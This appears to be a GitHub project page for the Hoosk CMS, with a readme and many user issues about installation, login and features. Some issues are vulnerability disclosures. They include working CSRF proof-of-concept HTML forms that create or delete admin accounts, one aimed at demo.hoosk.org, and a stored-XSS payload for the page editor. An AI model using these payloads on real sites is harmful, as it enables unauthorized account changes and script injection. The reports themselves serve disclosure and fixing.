
hoosk's Introduction

Hoosk

Hoosk is a lightweight, user-focused Content Management System (CMS) built in CodeIgniter which can be used to create stylish responsive websites with ease!

Live Demo

Try out the live demo at http://demo.hoosk.org

Documentation

I'm gonna start adding some docs and guides to the wiki for installation, using the system, creating themes, etc. Click the Wiki tab at the top or, if you're lazy, just use these links:

Getting Started

Advanced

Note: I am still writing more docs pages so check back soon

Credits

Plugins and libraries that I have made use of in Hoosk:

BrowserStack

Hoosk is cross browser tested using BrowserStack. BrowserStack provides instant access to multiple desktop and mobile browsers, check it out! - https://www.browserstack.com

hoosk's People

Contributors

havok89, krucamper, milstrike, waknauss


hoosk's Issues

CSRF issue that allows attacker to create an account

Hello. I want to report that it has a CSRF issue in the admin pages.
When an attacker induces an authenticated admin user to visit a malicious web page, the account will be created without the admin user's intention.

Here is how to reproduce the issue.
1. Log in to the admin page (/admin).
2. Stay logged in and access an HTML page that has the following content:

<html>
 <body>
 <script>history.pushState('', '', '/')</script>
   <form action="http://your.content.example.com" method="POST">
     <input type="hidden" name="username" value="test1" />
     <input type="hidden" name="email" value="test1&#64;example&#46;com" />
     <input type="hidden" name="password" value="test" />
     <input type="hidden" name="con&#95;password" value="test" />
     <input type="hidden" name="submit" value="Save" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>
3. And the account username = test1 is created without the admin user's intention.

Can't login to admin page

I have successfully installed hoosk on my server. No problems happened, I can login to the admin page.

However, after I moved it to another server (with the same specs), I cannot log in to the admin page.
There are no error messages, but I cannot log in to the admin page.
If you use the wrong username / password, then an error message appears.

I've tried various things, including deleting the value in $config["cookie_domain"] and truncating the session table, but still nothing changes.

Is there any idea for this?

Post and Pages

Cannot save or update posts or pages in Hoosk version 1.5.6. I get the notice "All fields marked with * are required!" when all the forms have been filled. tq
screenshot http://imgh.us/save_2.jpg

cannot login after installation

I installed hoosk and this "installation completed" page came up with a login button, but clicking on that button > "This site can’t be reached demohoosk’s server DNS address could not be found." Page is lost
What did I do wrong? I'm a beginner, please do help.

Published for Posts as well

Hi,

nice project - just downloaded it and playing around. Looks very cool!

What do you think about having a published flag (yes/no) for posts as well? Also it would be great to have this flag shown in the overview table of pages/posts to easily see which pages/posts are published.

Regards
miscs

How do I Block Control for Google Map API - Javascript - Simple Markers

I understand that you have to put it in sir-trevor.js, but I'm not an expert with JavaScript :(

<!DOCTYPE html>
<html>
  <head>
    <meta name="viewport" content="initial-scale=1.0, user-scalable=no">
    <meta charset="utf-8">
    <title>Simple markers</title>
    <style>
      html, body {
        height: 100%;
        margin: 0;
        padding: 0;
      }
      #map {
        height: 100%;
      }
    </style>
  </head>
  <body>
    <div id="map"></div>
    <script>

      function initMap() {
        var myLatLng = {lat: -25.363, lng: 131.044};

        var map = new google.maps.Map(document.getElementById('map'), {
          zoom: 4,
          center: myLatLng
        });

        var marker = new google.maps.Marker({
          position: myLatLng,
          map: map,
          title: 'Hello World!'
        });
      }
    </script>
    <script async defer
    src="https://maps.googleapis.com/maps/api/js?key=YOUR_API_KEY&callback=initMap">
    </script>
  </body>
</html>

Can Hoosk run on SQLite instead of MySQL?

Hello
First, thank you for sharing Hoosk. I have a very limited shared hosting account. Questions:
1. Can Hoosk run on SQLite instead of MySQL?
2. Your last version is dated 25/04/2017; when will the next version be available?
Thanks and regards
Jose

Version issue

What version do you use?
I'm trying with PHP 7.
Can't log in; I think the problem is with the cookie or session.

How to search a post in All Post?

I posted more than 100 dummy posts.
Now I have difficulty finding some posts and I didn't see any search feature.

Also, the pagination buttons look very primitive; can you style them?

Thank you

Regards,
Git

XSS on Hoosk v1.7.0

The XSS is on the page 'admin/pages/new'. Add a new text page and fill in <img src=1 onerror=alert(1)> in the 'Navigation Title* (this is displayed on navigation menus)' field.

problem with hoosk when add new page

Hi,
I have a problem with Hoosk CMS.
When I added a new page it gave me this error:

A Database Error Occurred
Error Number: 1364

Field 'pageParent' doesn't have a default value

INSERT INTO hoosk_page_attributes (pagePublished, pageTemplate, pageURL) VALUES ('1', 'page', 'thisisalopage')

Filename: C:/wamp/www/Hoosk/hoosk/hoosk0/models/Hoosk_model.php

Line Number: 228

Database Structure

Hi,
is there any reason why you do not use unique columns in the database (for some tables)?

Without unique columns it is complicated to manually edit the pages (phpMyAdmin for example).
Also, it is not yet possible to add colors and rich HTML text to the pages without manually editing the database.

Can you fix the unique columns in the database please?
They are located in content and navigation.

I also use version 1.4, as 1.5 refuses to work (admin arena).

Also, it would be nice to include a small tutorial on how to make custom pages like a contact form, as that does not exist yet (except the news.php page).

iframe also does NOT work: as soon as you put an iframe in it, it fails to save and it also fails to work like it needs to.

After being used to this system, it is still a nice system, but it is heavily limited at this moment for full use :(

Greets From PowerChaos

Unable Login

A couple of issues after setting up: I am unable to log in with the supplied username and passwords, and resetting doesn't send any links to reset. Digging deep, I got the way it creates the links; doing it that way and resetting said password, still nothing.

embed tweet

I cannot figure out the way to embed a tweet.

Uncaught Error

I'm trying to install Hoosk, I get this:
Fatal error: Uncaught Error: Call to undefined function mysql_connect()...

URL problem

After installing Hoosk I can't get access to the admin. The error is:
The requested URL /admin was not found on this server
Please help, thanks in advance.
Server specs:
Ubuntu 16.04
Apache 2.4
PHP 5.6

admin arena white page issue

Hi,
I got a fresh install of Hoosk 1.5, but after install the admin arena only displays a white page.
On the same config I installed version 1.4 and then the admin arena works perfectly.

Also a few suggestions:
the installer still works with mysql instead of mysqli/pdo,
so it throws out errors xD

Greets From PowerChaos

Navigation cannot be edited

This is a great CMS! I mean seriously.

I need some advice on how to add/delete or edit the Navigation menu. The Navigation module does not seem to be working as expected. I tried to add a new menu after creating a page but nothing happens (but it is working in the demo site http://demo.hoosk.org/).

Adding a new Navigation is also not working (also not working in the demo site as well).

Also, the default menu - News and Contact won't disappear after deleting the demo page - News and Contact. A new menu name will appear in the drop down option after creating a new page and can be added to the menu list but it will disappear again after clicking the save button.

Would appreciate if you could help on this. Thank you.

XSS on Hoosk v1.7.0

Hey, bro. I find that you didn't fix #47. And there is another XSS.


I have learned a lot from your code, thank you.

CSRF issue that allows attacker to delete an account

Hi, bro. I also found a CSRF issue in the admin page.

When an attacker induces an authenticated admin user to visit a malicious web page, any account can be deleted without the admin user's intention.

How to reproduce the issue:

  1. Log in to the admin page (/admin).
  2. Stay logged in and access an HTML page that has the following content:
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo.hoosk.org/admin/users/delete/userid" method="POST">
      <input type="hidden" name="deleteid" value="userid" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

userid is very easy to guess.

  3. And the account userid = userid is deleted without the admin user's intention.

How to fix this issue:
Set a CSRF token to protect the delete function.
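
The token check this report asks for, which applies equally to the account-creation CSRF report earlier on the page, shown as an added example that is not part of either issue and is not Hoosk's code. It assumes PHP 7 or later; the function names and the `csrf_token` field name are hypothetical.

```php
<?php
// Added example, not Hoosk code: synchronizer-token check for admin POSTs.
// Function names and the 'csrf_token' field name are hypothetical.

/** Return the per-session token, creating it on first use. */
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // 256-bit random value
    }
    return $session['csrf_token'];
}

/** Hidden field to embed in every state-changing admin form. */
function csrf_hidden_field(array &$session): string
{
    $token = htmlspecialchars(csrf_issue_token($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $token . '" />';
}

/** True only for a POST whose token matches the one stored in the session. */
function csrf_request_is_valid(string $method, array $post, array $session): bool
{
    if ($method !== 'POST') {
        return false; // state changes are accepted over POST only
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($supplied)) {
        return false; // no token issued yet, or a malformed field
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

// Constructed requests shaped like the delete form in the report.
$session = [];                // stands in for $_SESSION
csrf_hidden_field($session);  // admin loads a form; the token is issued

$requests = [
    'cross-site form (no token)' => ['deleteid' => '2'],
    'guessed token'              => ['deleteid' => '2', 'csrf_token' => str_repeat('0', 64)],
    'form served by the site'    => ['deleteid' => '2', 'csrf_token' => $session['csrf_token']],
];
foreach ($requests as $label => $post) {
    $ok = csrf_request_is_valid('POST', $post, $session);
    echo $label, ': ', $ok ? 'delete allowed' : 'rejected', PHP_EOL;
}
```

CodeIgniter 3 ships a built-in version of this check, enabled with `$config['csrf_protection'] = TRUE;` in config.php, which adds the hidden field automatically to forms generated with `form_open()`.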

Versioning

Another nice feature to have would be page/post versioning. Once the page/post is published the version is frozen and an edit creates a new version of this page/post.

Admin login doesn't work on SSL

I love Hoosk!

Trying to use it on my first 'real' website and have to use it with an SSL installed. Changed the root domain to include https which corrected lots of insecure resource warnings, but now I can't log in as the admin user. Is that a real bug?

cannot create new user

Error Number: 1364

Field 'RS' doesn't have a default value

INSERT INTO hoosk_user (userName, email, password) VALUES ('test', '[email protected]', '22d61613a8f7120dff19ee54ac97ac48')

Filename: C:/wamp64/www/test/hoosk/hoosk0/models/Hoosk_model.php

Line Number: 128

Session Lost after Redirect Login

I have already installed your CMS on our localhost, but we found some trouble after login. The login session is lost after a successful login. I have already solved this issue. Please change your config.php

from
$config['cookie_domain'] = ".".EMAIL_URL;
to
$config['cookie_domain'] = $_SERVER['SERVER_NAME'];

Thank you
Warm regards
Zani

Image uploading Issue

I got an error message when selecting an image from the jumbotron content editor, and the file is not uploaded anywhere. It gives us the error message "There was a problem with your upload".
So please fix it.
I hope you guys will do the needful.

admin page not working

I'm running an apache server with a new Hoosk installation behind a reverse proxy.
All requests are redirected to https. After installation I needed to manually change the BASE_URL in the generated config.php file because http was saved in the file.
So, the front-end is working currently... everything fine.

But I'm not able to display the admin page. When I log in, Hoosk returns an empty page.
Can I see some log files or errors for Hoosk?
Does someone maybe know how to fix this and tell me if this problem is related to the reverse proxy?

Current theme section showing error

Current Theme:

A PHP Error was encountered

Severity: Warning

Message: Invalid argument supplied for foreach()

Filename: admin/settings.php

Line Number: 83

Backtrace:

File: C:\xampp\htdocs\hoosk\hoosk\hoosk0\views\admin\settings.php
Line: 83
Function: _error_handler

File: C:\xampp\htdocs\hoosk\hoosk\hoosk0\core\MY_Loader.php
Line: 128
Function: include

File: C:\xampp\htdocs\hoosk\hoosk\hoosk0\controllers\admin\Admin.php
Line: 115
Function: view

File: C:\xampp\htdocs\hoosk\index.php
Line: 306
Function: require_once

Plus the favicon is missing as well

Login demo code

I have just successfully installed the cms.

The welcome page says:

Login details:
Username - demo
Password - h00sk

Unfortunately this is not working. Also having a look at the database I see that the username in the user table is "admin" and not "demo".

Also using "admin" as username would give an error.

Which credentials must be used to access the CMS?

I appreciate your help with this issue.

Franco

Tags

Are tags on the feature roadmap?

Relative Links

I am installing Hoosk onto my local machine and working from 127.0.0.1/example

However, all of your relative links are not working correctly... they are reverting the URL back to just 127.0.0.1 without the folder name at the end. Any way to fix this?

How to install Hoosk with apache2

I copied Hoosk to the /var/www/html directory and ran the installer. Everything seemed OK, but when it finished installing and I clicked the login button, it printed 404 not found for the /admin URL... How could I fix it? Thank you!

About dashboard translating

Hi, my first post at github.

I was translating the dashboard step by step through your tutorial, but the dashboard was always displayed in English.
I found out that there's a backslash at the end of each language name in the settings page (and in the database, of course, e.g. 'english\', 'traditional_chinese\').
This might cause a problem when Lang.php (hoosk\system\core\Lang.php) runs preg_match on the string around line 110.
I currently changed the match pattern from
preg_match('/^[a-z_-]+$/i', $idiom)
to
preg_match('/^[a-z_-]+(\\\\)*$/i', $idiom), and it works so far.
Thx for the great framework!

Mail Smtp

Hi, how do I make the mail SMTP settings?
I am editing System > Libraries > email.php, but it is not working.

public $mailpath = '/usr/sbin/smtp'; // Sendmail path
public $protocol = 'smtp';
public $smtp_host = 'smtp.sitehost.com';
public $smtp_user = '[email protected]';
public $smtp_pass = 'mypass';
public $smtp_port = 465;
public $smtp_timeout = 5;
public $smtp_crypto = 'ssl';

Can you tell me about gmail or others? Thanks.
